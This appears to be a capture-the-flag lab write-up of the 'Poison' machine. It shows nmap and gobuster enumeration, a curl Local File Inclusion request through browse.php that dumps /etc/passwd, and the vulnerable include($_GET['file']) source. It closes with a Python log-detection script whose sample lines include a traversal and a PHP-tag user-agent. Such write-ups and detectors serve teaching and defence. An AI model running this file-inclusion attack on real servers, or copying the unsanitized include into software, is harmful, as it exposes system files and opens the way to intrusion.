10.10.10.84 - Poison - LFI (Log Poisoning)

Summary:

Vulnerable software: misconfiguration of PHP/5.6.32, LFI
System vulnerable: 10.10.10.84
Vulnerability explanation: Local File Inclusion in the browse.php file.
Severity: critical

Enumeration:

====================================================================================
RUNNING NMAP TCP PORT ANALYSIS
====================================================================================
[+] Running only TCP port scan
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-01 22:05 GMT
Nmap scan report for 10.10.10.84
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (93%), FreeBSD 9.1-STABLE (91%), FreeBSD 12.0-CURRENT (90%), FreeBSD 7.0-RELEASE (90%), FreeBSD 7.0-RELEASE-p2 - 7.1-PRERELEASE (89%), FreeNAS 9.10 (FreeBSD 10.3-STABLE) (89%), Sony Playstation 4 or FreeBSD 10.2-RELEASE (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.29 seconds

The URL http://10.10.10.84/browse.php?file=listfiles.php lists a few files on the server, indicating that the *.php and *.txt file extensions are in use:

The file info.php reveals the OS version, which will become important later on (nmap's OS detection was accurate):

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64

The file phpinfo.php exposes the PHP 5.6.32 configuration:

The dangerous allow_url_fopen setting is enabled, pointing to the possibility of file inclusion. Note that allow_url_fopen governs URL wrappers (e.g. http://) in include() and related functions; the local inclusion itself only needs the unsanitized include() in browse.php.

Directory discovery:

└──╼ $gobuster -u http://10.10.10.84/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -x php
=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.84/
[+] Threads : 50
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php
[+] Timeout : 10s
=====================================================
2019/02/01 22:16:44 Starting gobuster
=====================================================
/index.php (Status: 200)
/info.php (Status: 200)
/browse.php (Status: 200)
/phpinfo.php (Status: 200)
=====================================================
2019/02/01 22:23:11 Finished
=====================================================

Vulnerability exploitation:

Since allow_url_fopen was set to on, we checked for an LFI vulnerability; in this case an attacker could include the local file /etc/passwd:

└──╼ $curl -k http://10.10.10.84/browse.php?file=/etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

Under the right conditions a Local File Inclusion vulnerability can be pushed considerably further:

LFI -> RCE through PHPinfo.php

LFI -> RCE through Apache Log Poisoning

Source code of vulnerable browse.php file:

www@Poison:/usr/local/www/apache24/data % cat browse.php
<?php
include($_GET['file']);
?>
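The two escalation paths above leave traces in the Apache access log: an out-of-scope value in browse.php's file parameter, and PHP tags arriving in a client-controlled header (the log poisoning step). The detection script below is an added example and not part of the original writeup; it parses constructed Apache combined-format log lines (the sample entries and the flagged patterns are assumptions, not data from the target) and reports both indicators.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format (regex written for this example, matches the default layout).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Values that have no business in browse.php?file= on this host: the writeup shows
# /etc/passwd being included, and log poisoning needs the Apache log itself.
SUSPICIOUS_FILE = re.compile(r'(\.\./|^/|php://|data:|/var/log/|\.log$)', re.I)
# A PHP open tag inside a client-controlled header is the log-poisoning tell.
PHP_TAG = re.compile(r'<\?(php|=)?', re.I)

def classify(line):
    """Return the findings for one access-log line (empty list if it looks benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable line"]
    findings = []
    params = parse_qs(urlsplit(m["target"]).query)
    for value in params.get("file", []):
        value = unquote(value)  # catch double-encoded traversal as well
        if SUSPICIOUS_FILE.search(value):
            findings.append(f"lfi: file={value}")
    for field in ("ua", "referer"):
        if PHP_TAG.search(m[field]):
            findings.append(f"log-poisoning: php tag in {field}")
    return findings

def scan(lines):
    """Map each flagged line to its findings; benign lines are dropped."""
    results = {}
    for ln in lines:
        hits = classify(ln)
        if hits:
            results[ln] = hits
    return results

# Constructed sample log lines in the style of this host; not taken from the original page.
SAMPLE = [
    '10.10.14.5 - - [01/Feb/2019:22:30:01 +0000] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Feb/2019:22:31:10 +0000] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.64.0"',
    '10.10.14.5 - - [01/Feb/2019:22:32:42 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "<?php /* marker */ ?>"',
    '10.10.14.5 - - [01/Feb/2019:22:33:05 +0000] "GET /browse.php?file=..%2F..%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE).items():
        print(hits, "<-", line[:80])
```

The same check run over the real httpd-access.log would surface the poisoning request before the follow-up include of the log file is attempted.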